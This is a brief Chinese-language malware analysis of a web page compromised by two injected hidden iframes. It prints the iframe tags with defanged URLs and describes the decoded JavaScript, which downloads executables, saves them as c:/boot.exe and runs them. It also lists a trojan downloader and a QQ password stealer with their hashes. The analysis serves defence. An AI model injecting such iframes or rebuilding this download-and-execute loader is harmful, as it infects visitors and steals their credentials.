网页首部被加入两段代码:
代码段1:
/--------- <iframe height=0 width=0 src="hxxp://ip-ie.www***113.cnidc.cn/w***m/"></iframe> ----------/
w***m.htm的内容为的内容为 escape( ) 加密的代码,解密后的内容为 JavaScript 脚本程序,利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/111.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
代码段2:
/--------- <iframe height=0 width=0 src="hxxp://www.z***zy***qr.com.**/f***j/wm**.htm/"></iframe> ----------/
wm**.htm 的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript脚本程序,也是利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/game/fj.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
fj.exe 采用 Borland Delphi Setup Module 制作,
/---------
获取文件版本信息大小失败!
创建时间 : 2006-12-1 20:42:53
大小 : 15872 字节 15.512 KB
MD5 : 945db5a79cf5e1a0cf097cbb30af858e
---------/
Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm。
fj.exe 会从同一网站下载下列文件:
1)/mc/bao/fujia.exe
,采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 制作,
/---------
大小 : 39069 字节 38.157 KB
MD5 : 9ac6f3cb5741973297c2be2b282f19b9
---------/
Kaspersky 报为 Trojan-PSW.Win32.QQPass.ra。
2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳。
/---------
